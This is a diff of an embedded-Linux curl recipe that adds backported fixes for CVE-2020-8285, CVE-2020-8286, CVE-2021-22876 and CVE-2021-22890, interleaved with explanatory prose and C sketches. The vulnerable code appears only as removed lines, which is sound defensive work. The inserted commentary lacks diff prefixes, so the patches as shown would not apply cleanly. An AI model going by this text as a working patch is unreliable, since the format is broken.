+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1406 b/tests/data/test1406
+index 51a166adff2..38f68d11ee1 100644
+--- a/tests/data/test1406
++++ b/tests/data/test1406
+@@ -79,6 +79,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_URL, "smtp://%HOSTIP:%SMTPPORT/1406");
+ curl_easy_setopt(hnd, CURLOPT_UPLOAD, 1L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ curl_easy_setopt(hnd, CURLOPT_MAIL_FROM, "sender@example.com");
+ curl_easy_setopt(hnd, CURLOPT_MAIL_RCPT, slist1);
+diff --git a/tests/data/test1407 b/tests/data/test1407
+index f6879008fb2..a7e13ba7585 100644
+--- a/tests/data/test1407
++++ b/tests/data/test1407
+@@ -62,6 +62,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_DIRLISTONLY, 1L);
+ curl_easy_setopt(hnd, CURLOPT_USERPWD, "user:secret");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1420 b/tests/data/test1420
+index 057ecc4773a..4b8d7bbf418 100644
+--- a/tests/data/test1420
++++ b/tests/data/test1420
+@@ -67,6 +67,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_URL, "imap://%HOSTIP:%IMAPPORT/1420/;MAILINDEX=1");
+ curl_easy_setopt(hnd, CURLOPT_USERPWD, "user:secret");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8285.patch b/meta/recipes-support/curl/curl/CVE-2020-8285.patch
new file mode 100644
index 0000000000..a66729b180
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8285.patch
@@ -0,0 +1,260 @@
+From 6fda045b19a9066701b5e09cfa657a13a3accbf3 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Sat, 28 Nov 2020 00:27:21 +0100
+Subject: [PATCH] ftp: make wc_statemach loop instead of recurse
+
+CVE-2020-8285
+
+Fixes #6255
+Bug: https://curl.se/docs/CVE-2020-8285.html
+Reported-by: xnynx on github
+
+Upstream-commit: 69a358f2186e04cf44698b5100332cbf1ee7f01d
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0006-curl-7.69.1-CVE-2020-8285.patch]
+CVE: CVE-2020-8285
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
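
The shape of the conversion is easier to see stripped of the FTP details: each tail call of the state machine becomes a continue inside a for(;;) loop, so an arbitrarily long chain of state transitions no longer grows the stack. A schematic sketch with made-up states, not curl's actual code:

    enum state { INIT, MATCHING, DOWNLOADING, SKIP, CLEAN, DONE };

    static int statemach(enum state *s)
    {
      for(;;) {
        switch(*s) {
        case INIT:
          *s = MATCHING;
          continue;              /* was: return statemach(s); */
        case MATCHING:
          *s = DOWNLOADING;
          continue;
        case DOWNLOADING:
          *s = SKIP;
          continue;
        case SKIP:
          *s = CLEAN;
          continue;
        case CLEAN:
          *s = DONE;
          continue;
        case DONE:
          return 0;              /* exit the loop instead of unwinding frames */
        }
      }
    }
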
+---
+ lib/ftp.c | 202 +++++++++++++++++++++++++++---------------------------
+ 1 file changed, 102 insertions(+), 100 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 57b22ad..3382772 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -3763,129 +3763,131 @@ static CURLcode init_wc_data(struct connectdata *conn)
+ return result;
+ }
+
+-/* This is called recursively */
+ static CURLcode wc_statemach(struct connectdata *conn)
+ {
+ struct WildcardData * const wildcard = &(conn->data->wildcard);
+ CURLcode result = CURLE_OK;
+
+- switch(wildcard->state) {
+- case CURLWC_INIT:
+- result = init_wc_data(conn);
+- if(wildcard->state == CURLWC_CLEAN)
+- /* only listing! */
+- break;
+- wildcard->state = result ? CURLWC_ERROR : CURLWC_MATCHING;
+- break;
++ for(;;) {
++ switch(wildcard->state) {
++ case CURLWC_INIT:
++ result = init_wc_data(conn);
++ if(wildcard->state == CURLWC_CLEAN)
++ /* only listing! */
++ return result;
++ wildcard->state = result ? CURLWC_ERROR : CURLWC_MATCHING;
++ return result;
+
+- case CURLWC_MATCHING: {
+- /* In this state is LIST response successfully parsed, so lets restore
+- previous WRITEFUNCTION callback and WRITEDATA pointer */
+- struct ftp_wc *ftpwc = wildcard->protdata;
+- conn->data->set.fwrite_func = ftpwc->backup.write_function;
+- conn->data->set.out = ftpwc->backup.file_descriptor;
+- ftpwc->backup.write_function = ZERO_NULL;
+- ftpwc->backup.file_descriptor = NULL;
+- wildcard->state = CURLWC_DOWNLOADING;
+-
+- if(Curl_ftp_parselist_geterror(ftpwc->parser)) {
+- /* error found in LIST parsing */
+- wildcard->state = CURLWC_CLEAN;
+- return wc_statemach(conn);
+- }
+- if(wildcard->filelist.size == 0) {
+- /* no corresponding file */
+- wildcard->state = CURLWC_CLEAN;
+- return CURLE_REMOTE_FILE_NOT_FOUND;
++ case CURLWC_MATCHING: {
++ /* In this state is LIST response successfully parsed, so lets restore
++ previous WRITEFUNCTION callback and WRITEDATA pointer */
++ struct ftp_wc *ftpwc = wildcard->protdata;
++ conn->data->set.fwrite_func = ftpwc->backup.write_function;
++ conn->data->set.out = ftpwc->backup.file_descriptor;
++ ftpwc->backup.write_function = ZERO_NULL;
++ ftpwc->backup.file_descriptor = NULL;
++ wildcard->state = CURLWC_DOWNLOADING;
++
++ if(Curl_ftp_parselist_geterror(ftpwc->parser)) {
++ /* error found in LIST parsing */
++ wildcard->state = CURLWC_CLEAN;
++ continue;
++ }
++ if(wildcard->filelist.size == 0) {
++ /* no corresponding file */
++ wildcard->state = CURLWC_CLEAN;
++ return CURLE_REMOTE_FILE_NOT_FOUND;
++ }
++ continue;
+ }
+- return wc_statemach(conn);
+- }
+
+- case CURLWC_DOWNLOADING: {
+- /* filelist has at least one file, lets get first one */
+- struct ftp_conn *ftpc = &conn->proto.ftpc;
+- struct curl_fileinfo *finfo = wildcard->filelist.head->ptr;
+- struct FTP *ftp = conn->data->req.protop;
++ case CURLWC_DOWNLOADING: {
++ /* filelist has at least one file, lets get first one */
++ struct ftp_conn *ftpc = &conn->proto.ftpc;
++ struct curl_fileinfo *finfo = wildcard->filelist.head->ptr;
++ struct FTP *ftp = conn->data->req.protop;
+
+- char *tmp_path = aprintf("%s%s", wildcard->path, finfo->filename);
+- if(!tmp_path)
+- return CURLE_OUT_OF_MEMORY;
++ char *tmp_path = aprintf("%s%s", wildcard->path, finfo->filename);
++ if(!tmp_path)
++ return CURLE_OUT_OF_MEMORY;
+
+- /* switch default ftp->path and tmp_path */
+- free(ftp->pathalloc);
+- ftp->pathalloc = ftp->path = tmp_path;
+-
+- infof(conn->data, "Wildcard - START of \"%s\"\n", finfo->filename);
+- if(conn->data->set.chunk_bgn) {
+- long userresponse;
+- Curl_set_in_callback(conn->data, true);
+- userresponse = conn->data->set.chunk_bgn(
+- finfo, wildcard->customptr, (int)wildcard->filelist.size);
+- Curl_set_in_callback(conn->data, false);
+- switch(userresponse) {
+- case CURL_CHUNK_BGN_FUNC_SKIP:
+- infof(conn->data, "Wildcard - \"%s\" skipped by user\n",
+- finfo->filename);
+- wildcard->state = CURLWC_SKIP;
+- return wc_statemach(conn);
+- case CURL_CHUNK_BGN_FUNC_FAIL:
+- return CURLE_CHUNK_FAILED;
++ /* switch default ftp->path and tmp_path */
++ free(ftp->pathalloc);
++ ftp->pathalloc = ftp->path = tmp_path;
++
++ infof(conn->data, "Wildcard - START of \"%s\"\n", finfo->filename);
++ if(conn->data->set.chunk_bgn) {
++ long userresponse;
++ Curl_set_in_callback(conn->data, true);
++ userresponse = conn->data->set.chunk_bgn(
++ finfo, wildcard->customptr, (int)wildcard->filelist.size);
++ Curl_set_in_callback(conn->data, false);
++ switch(userresponse) {
++ case CURL_CHUNK_BGN_FUNC_SKIP:
++ infof(conn->data, "Wildcard - \"%s\" skipped by user\n",
++ finfo->filename);
++ wildcard->state = CURLWC_SKIP;
++ continue;
++ case CURL_CHUNK_BGN_FUNC_FAIL:
++ return CURLE_CHUNK_FAILED;
++ }
+ }
+- }
+
+- if(finfo->filetype != CURLFILETYPE_FILE) {
+- wildcard->state = CURLWC_SKIP;
+- return wc_statemach(conn);
+- }
++ if(finfo->filetype != CURLFILETYPE_FILE) {
++ wildcard->state = CURLWC_SKIP;
++ continue;
++ }
+
+- if(finfo->flags & CURLFINFOFLAG_KNOWN_SIZE)
+- ftpc->known_filesize = finfo->size;
++ if(finfo->flags & CURLFINFOFLAG_KNOWN_SIZE)
++ ftpc->known_filesize = finfo->size;
+
+- result = ftp_parse_url_path(conn);
+- if(result)
+- return result;
++ result = ftp_parse_url_path(conn);
++ if(result)
++ return result;
+
+- /* we don't need the Curl_fileinfo of first file anymore */
+- Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
++ /* we don't need the Curl_fileinfo of first file anymore */
++ Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
+
+- if(wildcard->filelist.size == 0) { /* remains only one file to down. */
+- wildcard->state = CURLWC_CLEAN;
+- /* after that will be ftp_do called once again and no transfer
+- will be done because of CURLWC_CLEAN state */
+- return CURLE_OK;
++ if(wildcard->filelist.size == 0) { /* remains only one file to down. */
++ wildcard->state = CURLWC_CLEAN;
++ /* after that will be ftp_do called once again and no transfer
++ will be done because of CURLWC_CLEAN state */
++ return CURLE_OK;
++ }
++ return result;
+ }
+- } break;
+
+- case CURLWC_SKIP: {
+- if(conn->data->set.chunk_end) {
+- Curl_set_in_callback(conn->data, true);
+- conn->data->set.chunk_end(conn->data->wildcard.customptr);
+- Curl_set_in_callback(conn->data, false);
++ case CURLWC_SKIP: {
++ if(conn->data->set.chunk_end) {
++ Curl_set_in_callback(conn->data, true);
++ conn->data->set.chunk_end(conn->data->wildcard.customptr);
++ Curl_set_in_callback(conn->data, false);
++ }
++ Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
++ wildcard->state = (wildcard->filelist.size == 0) ?
++ CURLWC_CLEAN : CURLWC_DOWNLOADING;
++ continue;
+ }
+- Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
+- wildcard->state = (wildcard->filelist.size == 0) ?
+- CURLWC_CLEAN : CURLWC_DOWNLOADING;
+- return wc_statemach(conn);
+- }
+
+- case CURLWC_CLEAN: {
+- struct ftp_wc *ftpwc = wildcard->protdata;
+- result = CURLE_OK;
+- if(ftpwc)
+- result = Curl_ftp_parselist_geterror(ftpwc->parser);
++ case CURLWC_CLEAN: {
++ struct ftp_wc *ftpwc = wildcard->protdata;
++ result = CURLE_OK;
++ if(ftpwc)
++ result = Curl_ftp_parselist_geterror(ftpwc->parser);
+
+- wildcard->state = result ? CURLWC_ERROR : CURLWC_DONE;
+- } break;
++ wildcard->state = result ? CURLWC_ERROR : CURLWC_DONE;
++ return result;
++ }
+
+- case CURLWC_DONE:
+- case CURLWC_ERROR:
+- case CURLWC_CLEAR:
+- if(wildcard->dtor)
+- wildcard->dtor(wildcard->protdata);
+- break;
++ case CURLWC_DONE:
++ case CURLWC_ERROR:
++ case CURLWC_CLEAR:
++ if(wildcard->dtor)
++ wildcard->dtor(wildcard->protdata);
++ return result;
++ }
+ }
+-
+- return result;
++ /* UNREACHABLE */
+ }
+
+ /***********************************************************************
+--
+2.26.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8286.patch b/meta/recipes-support/curl/curl/CVE-2020-8286.patch
new file mode 100644
index 0000000000..093562fe01
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8286.patch
@@ -0,0 +1,133 @@
+From 43d1163b3730f715704240f7f6d31af289246873 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Wed, 2 Dec 2020 23:01:11 +0100
+Subject: [PATCH] openssl: make the OCSP verification verify the certificate id
+
+CVE-2020-8286
+
+Reported by anonymous
+
+Bug: https://curl.se/docs/CVE-2020-8286.html
+
+Upstream-commit: d9d01672785b8ac04aab1abb6de95fe3072ae199
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0007-curl-7.71.1-CVE-2020-8286.patch ]
+CVE: CVE-2020-8286
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
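
For readers less familiar with the OpenSSL OCSP API, this is the core of the new logic in isolation: compute the peer certificate's OCSP_CERTID from its issuer and look up exactly that ID in the response, rather than accepting whichever single responses happen to be present. A hedged sketch, assuming the caller already holds the peer certificate, its issuer, and a basic response that passed OCSP_basic_verify():

    #include <openssl/ocsp.h>
    #include <openssl/evp.h>
    #include <openssl/x509.h>

    /* Sketch of the ID-based lookup introduced by this patch. Returns 0 only
       when the response covers this certificate, is current, and says GOOD. */
    static int ocsp_status_for_cert(OCSP_BASICRESP *br, X509 *cert, X509 *issuer)
    {
      int status, reason;
      ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
      OCSP_CERTID *id = OCSP_cert_to_id(EVP_sha1(), cert, issuer);

      if(!id)
        return -1;                       /* could not compute the ID */

      /* Only accept a single response matching this exact certificate. */
      if(OCSP_resp_find_status(br, id, &status, &reason, &rev,
                               &thisupd, &nextupd) != 1) {
        OCSP_CERTID_free(id);
        return -1;                       /* no response for this certificate */
      }
      OCSP_CERTID_free(id);

      if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L))
        return -1;                       /* response expired */

      return status == V_OCSP_CERTSTATUS_GOOD ? 0 : -1;
    }
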
+---
+ lib/vtls/openssl.c | 83 ++++++++++++++++++++++++++++++----------------
+ 1 file changed, 54 insertions(+), 29 deletions(-)
+
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 1d09cad..bcfd83b 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -1717,6 +1717,11 @@ static CURLcode verifystatus(struct connectdata *conn,
+ OCSP_BASICRESP *br = NULL;
+ X509_STORE *st = NULL;
+ STACK_OF(X509) *ch = NULL;
++ X509 *cert;
++ OCSP_CERTID *id = NULL;
++ int cert_status, crl_reason;
++ ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
++ int ret;
+
+ long len = SSL_get_tlsext_status_ocsp_resp(BACKEND->handle, &status);
+
+@@ -1785,43 +1790,63 @@ static CURLcode verifystatus(struct connectdata *conn,
+ goto end;
+ }
+
+- for(i = 0; i < OCSP_resp_count(br); i++) {
+- int cert_status, crl_reason;
+- OCSP_SINGLERESP *single = NULL;
+-
+- ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
++ /* Compute the certificate's ID */
++ cert = SSL_get_peer_certificate(BACKEND->handle);
++ if(!cert) {
++ failf(data, "Error getting peer certficate");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- single = OCSP_resp_get0(br, i);
+- if(!single)
+- continue;
++ for(i = 0; i < sk_X509_num(ch); i++) {
++ X509 *issuer = sk_X509_value(ch, i);
++ if(X509_check_issued(issuer, cert) == X509_V_OK) {
++ id = OCSP_cert_to_id(EVP_sha1(), cert, issuer);
++ break;
++ }
++ }
++ X509_free(cert);
+
+- cert_status = OCSP_single_get0_status(single, &crl_reason, &rev,
+- &thisupd, &nextupd);
++ if(!id) {
++ failf(data, "Error computing OCSP ID");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L)) {
+- failf(data, "OCSP response has expired");
+- result = CURLE_SSL_INVALIDCERTSTATUS;
+- goto end;
+- }
++ /* Find the single OCSP response corresponding to the certificate ID */
++ ret = OCSP_resp_find_status(br, id, &cert_status, &crl_reason, &rev,
++ &thisupd, &nextupd);
++ OCSP_CERTID_free(id);
++ if(ret != 1) {
++ failf(data, "Could not find certificate ID in OCSP response");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- infof(data, "SSL certificate status: %s (%d)\n",
+- OCSP_cert_status_str(cert_status), cert_status);
++ /* Validate the corresponding single OCSP response */
++ if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L)) {
++ failf(data, "OCSP response has expired");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- switch(cert_status) {
+- case V_OCSP_CERTSTATUS_GOOD:
+- break;
++ infof(data, "SSL certificate status: %s (%d)\n",
++ OCSP_cert_status_str(cert_status), cert_status);
+
+- case V_OCSP_CERTSTATUS_REVOKED:
+- result = CURLE_SSL_INVALIDCERTSTATUS;
++ switch(cert_status) {
++ case V_OCSP_CERTSTATUS_GOOD:
++ break;
+
+- failf(data, "SSL certificate revocation reason: %s (%d)",
+- OCSP_crl_reason_str(crl_reason), crl_reason);
+- goto end;
++ case V_OCSP_CERTSTATUS_REVOKED:
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ failf(data, "SSL certificate revocation reason: %s (%d)",
++ OCSP_crl_reason_str(crl_reason), crl_reason);
++ goto end;
+
+- case V_OCSP_CERTSTATUS_UNKNOWN:
+- result = CURLE_SSL_INVALIDCERTSTATUS;
+- goto end;
+- }
++ case V_OCSP_CERTSTATUS_UNKNOWN:
++ default:
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
+ }
+
+ end:
+--
+2.26.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22876.patch b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
new file mode 100644
index 0000000000..fc396aabef
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
@@ -0,0 +1,59 @@
+transfer: strip credentials from the auto-referer header field
+
+CVE-2021-22876
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+Bug: https://curl.se/docs/CVE-2021-22876.html
+Upstream-Status: Backport
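
The same stripping can be reproduced outside the library with the public CURLU API, which is what the patched Curl_follow() uses internally; the input URL below is only an example:

    #include <stdio.h>
    #include <curl/curl.h>

    /* Illustrative: drop credentials and fragment from a URL before using it
       as an automatic Referer value. */
    int main(void)
    {
      CURLU *u = curl_url();
      char *clean = NULL;
      CURLUcode uc;

      if(!u)
        return 1;

      uc = curl_url_set(u, CURLUPART_URL,
                        "https://user:secret@example.com/path#frag", 0);
      if(!uc)
        uc = curl_url_set(u, CURLUPART_USER, NULL, 0);
      if(!uc)
        uc = curl_url_set(u, CURLUPART_PASSWORD, NULL, 0);
      if(!uc)
        uc = curl_url_set(u, CURLUPART_FRAGMENT, NULL, 0);
      if(!uc)
        uc = curl_url_get(u, CURLUPART_URL, &clean, 0);

      if(!uc)
        printf("referer would be: %s\n", clean); /* https://example.com/path */

      curl_free(clean);
      curl_url_cleanup(u);
      return 0;
    }
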
+---
+ lib/transfer.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index e76834eb3..744e1c00b 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1570,6 +1570,9 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ data->set.followlocation++; /* count location-followers */
+
+ if(data->set.http_auto_referer) {
++ CURLU *u;
++ char *referer;
++
+ /* We are asked to automatically set the previous URL as the referer
+ when we get the next URL. We pick the ->url field, which may or may
+ not be 100% correct */
+@@ -1579,9 +1582,27 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ data->change.referer_alloc = FALSE;
+ }
+
+- data->change.referer = strdup(data->change.url);
+- if(!data->change.referer)
++ /* Make a copy of the URL without credentials and fragment */
++ u = curl_url();
++ if(!u)
++ return CURLE_OUT_OF_MEMORY;
++
++ uc = curl_url_set(u, CURLUPART_URL, data->change.url, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_FRAGMENT, NULL, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_USER, NULL, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_PASSWORD, NULL, 0);
++ if(!uc)
++ uc = curl_url_get(u, CURLUPART_URL, &referer, 0);
++
++ curl_url_cleanup(u);
++
++ if(uc || referer == NULL)
+ return CURLE_OUT_OF_MEMORY;
++
++ data->change.referer = referer;
+ data->change.referer_alloc = TRUE; /* yes, free this later */
+ }
+ }
+--
+2.20.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22890.patch b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
new file mode 100644
index 0000000000..8c0ecbfe7f
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
@@ -0,0 +1,464 @@
+vtls: add 'isproxy' argument to Curl_ssl_get/addsessionid()
+
+To make sure we set and extract the correct session.
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+CVE-2021-22890
+
+Reported-by: Mingtao Yang
+Bug: https://curl.se/docs/CVE-2021-22890.html
+Upstream-Status: Backport
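
The underlying idea is that a cached TLS session must be keyed on whether it was negotiated with the proxy or with the origin server, not just on host name and port. A hypothetical, simplified lookup (these are not curl's data structures) showing the extra key field:

    #include <stdbool.h>
    #include <stddef.h>
    #include <string.h>

    /* Hypothetical session-cache entry: the isproxy flag added by this patch
       becomes part of the lookup key, so a session negotiated with an HTTPS
       proxy is never handed out for the origin server, or vice versa. */
    struct session_entry {
      char host[256];
      int port;
      bool isproxy;
      void *session;            /* backend-specific session object */
    };

    static void *lookup_session(struct session_entry *cache, size_t n,
                                const char *host, int port, bool isproxy)
    {
      size_t i;
      for(i = 0; i < n; i++) {
        if(cache[i].port == port &&
           cache[i].isproxy == isproxy &&       /* the new part of the key */
           !strcmp(cache[i].host, host))
          return cache[i].session;
      }
      return NULL;
    }
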
+---
+ lib/vtls/bearssl.c | 9 +++++---
+ lib/vtls/gtls.c | 9 +++++---
+ lib/vtls/mbedtls.c | 8 ++++---
+ lib/vtls/mesalink.c | 9 +++++---
+ lib/vtls/openssl.c | 52 ++++++++++++++++++++++++++++++++++----------
+ lib/vtls/schannel.c | 10 +++++----
+ lib/vtls/sectransp.c | 9 ++++----
+ lib/vtls/vtls.c | 9 ++++++--
+ lib/vtls/vtls.h | 2 ++
+ lib/vtls/wolfssl.c | 8 ++++---
+ 10 files changed, 88 insertions(+), 37 deletions(-)
+
+diff --git a/lib/vtls/bearssl.c b/lib/vtls/bearssl.c
+index 67f945831..32cb0a4c2 100644
+--- a/lib/vtls/bearssl.c
++++ b/lib/vtls/bearssl.c
+@@ -372,7 +372,8 @@ static CURLcode bearssl_connect_step1(struct connectdata *conn, int sockindex)
+ void *session;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &session, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &session, NULL, sockindex)) {
+ br_ssl_engine_set_session_parameters(&BACKEND->ctx.eng, session);
+ infof(data, "BearSSL: re-using session ID\n");
+ }
+@@ -560,10 +561,12 @@ static CURLcode bearssl_connect_step3(struct connectdata *conn, int sockindex)
+ return CURLE_OUT_OF_MEMORY;
+ br_ssl_engine_get_session_parameters(&BACKEND->ctx.eng, session);
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &oldsession, NULL, sockindex));
++ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &oldsession, NULL, sockindex));
+ if(incache)
+ Curl_ssl_delsessionid(conn, oldsession);
+- ret = Curl_ssl_addsessionid(conn, session, 0, sockindex);
++ ret = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ session, 0, sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(ret) {
+ free(session);
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 5f740eeba..46e149c7d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -937,7 +937,8 @@ gtls_connect_step1(struct connectdata *conn,
+ size_t ssl_idsize;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, &ssl_idsize, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, &ssl_idsize, sockindex)) {
+ /* we got a session id, use it! */
+ gnutls_session_set_data(session, ssl_sessionid, ssl_idsize);
+
+@@ -1485,7 +1486,8 @@ gtls_connect_step3(struct connectdata *conn,
+ gnutls_session_get_data(session, connect_sessionid, &connect_idsize);
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL,
+ sockindex));
+ if(incache) {
+ /* there was one before in the cache, so instead of risking that the
+@@ -1494,7 +1496,8 @@ gtls_connect_step3(struct connectdata *conn,
+ }
+
+ /* store this session id */
+- result = Curl_ssl_addsessionid(conn, connect_sessionid, connect_idsize,
++ result = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ connect_sessionid, connect_idsize,
+ sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(result) {
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index f057315f3..19df8478e 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -453,7 +453,8 @@ mbed_connect_step1(struct connectdata *conn,
+ void *old_session = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &old_session, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &old_session, NULL, sockindex)) {
+ ret = mbedtls_ssl_set_session(&BACKEND->ssl, old_session);
+ if(ret) {
+ Curl_ssl_sessionid_unlock(conn);
+@@ -709,6 +710,7 @@ mbed_connect_step3(struct connectdata *conn,
+ int ret;
+ mbedtls_ssl_session *our_ssl_sessionid;
+ void *old_ssl_sessionid = NULL;
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ our_ssl_sessionid = malloc(sizeof(mbedtls_ssl_session));
+ if(!our_ssl_sessionid)
+@@ -727,10 +729,10 @@ mbed_connect_step3(struct connectdata *conn,
+
+ /* If there's already a matching session in the cache, delete it */
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex))
++ if(!Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL, sockindex))
+ Curl_ssl_delsessionid(conn, old_ssl_sessionid);
+
+- retcode = Curl_ssl_addsessionid(conn, our_ssl_sessionid, 0, sockindex);
++ retcode = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid, 0, sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(retcode) {
+ mbedtls_ssl_session_free(our_ssl_sessionid);
+diff --git a/lib/vtls/mesalink.c b/lib/vtls/mesalink.c
+index cab1e390b..79d1e3dfa 100644
+--- a/lib/vtls/mesalink.c
++++ b/lib/vtls/mesalink.c
+@@ -263,7 +263,8 @@ mesalink_connect_step1(struct connectdata *conn, int sockindex)
+ void *ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ Curl_ssl_sessionid_unlock(conn);
+@@ -347,12 +348,14 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+ bool incache;
+ SSL_SESSION *our_ssl_sessionid;
+ void *old_ssl_sessionid = NULL;
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ our_ssl_sessionid = SSL_get_session(BACKEND->handle);
+
+ Curl_ssl_sessionid_lock(conn);
+ incache =
+- !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex));
++ !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid,
++ NULL, sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != our_ssl_sessionid) {
+ infof(data, "old SSL session ID is stale, removing\n");
+@@ -363,7 +366,7 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+
+ if(!incache) {
+ result = Curl_ssl_addsessionid(
+- conn, our_ssl_sessionid, 0 /* unknown size */, sockindex);
++ conn, isproxy, our_ssl_sessionid, 0 /* unknown size */, sockindex);
+ if(result) {
+ Curl_ssl_sessionid_unlock(conn);
+ failf(data, "failed to store ssl session");
